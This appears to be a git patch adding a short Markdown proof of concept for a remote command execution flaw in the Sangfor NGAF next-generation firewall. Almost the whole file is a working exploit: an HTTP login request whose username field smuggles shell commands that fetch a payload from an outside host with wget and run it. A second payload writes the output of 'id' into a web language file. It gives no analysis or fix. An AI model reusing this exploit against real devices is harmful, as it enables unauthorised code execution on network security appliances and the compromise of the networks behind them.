From 60a743210610eafe90ee50449a0368c5a2a968a5 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 21 Oct 2023 20:41:44 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B7=B1=E4=BF=A1=E6=9C=8D=E4=B8=8B?=
 =?UTF-8?q?=E4=B8=80=E4=BB=A3=E9=98=B2=E7=81=AB=E5=A2=99NGAF=20RCE?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 深信服下一代防火墙NGAF RCE漏洞.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 深信服下一代防火墙NGAF RCE漏洞.md

diff --git a/深信服下一代防火墙NGAF RCE漏洞.md b/深信服下一代防火墙NGAF RCE漏洞.md
new file mode 100644
index 0000000..8e2f489
--- /dev/null
+++ b/深信服下一代防火墙NGAF RCE漏洞.md	
@@ -0,0 +1,21 @@
+
+## 深信服下一代防火墙NGAF RCE漏洞
+
+## POC
+```
+POST /LogInOut.php HTTP/1.1
+Host:
+Cookie: PHPSESSID=2e01d2ji93utnsb5abrcm780c2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Connection: close
+Content-Length: 625
+
+type=logged&un=watchTowr;wget http://<host>/cmd.txt;source /virus/dcweb/webapps/cmd.txt&up=0f2df0a6f151e836c8ccd1c2ea3bfbdfb7bfa0d38d438942492bd8f28f3e92939319f932f2f2add6d0d484accdc4c28269b203c4dc77c1da941fa19dae017d44d6ea8cad2572e37c485a8ebcb4bdb510cc86420a50ae45ae07daf5fe9c40fe133f3806cd8f3158ee359766e8e19c9fbbf7e888bf0d7f3952f4d083bd17cd19eb960dadec2835f6f259616f5b2e5942d3a4d1754cbd69696fae60ef18358bf5782dd5ebf377f5642e0583e630660ccac241a615ae21bfc12852a32d0367a899eb010e5d1c33669fc2e9ea3a0ecbf078c22120196a115b4038288063bf99610d3d331acb53e5c8fbd14229a4abdff83cf075a7b97a9bb9dae3586f19256f4262d5&vericode=<correct captcha>
+```
+
+Cmd.txt 有效载荷：
+```
+sed -i s/Lock/"$(id)"/g /virus/dcweb/conf/lang/eng.utf8.lang.app.php
+```
+
+![](https://labs.watchtowr.com/content/images/2023/10/image-13.png)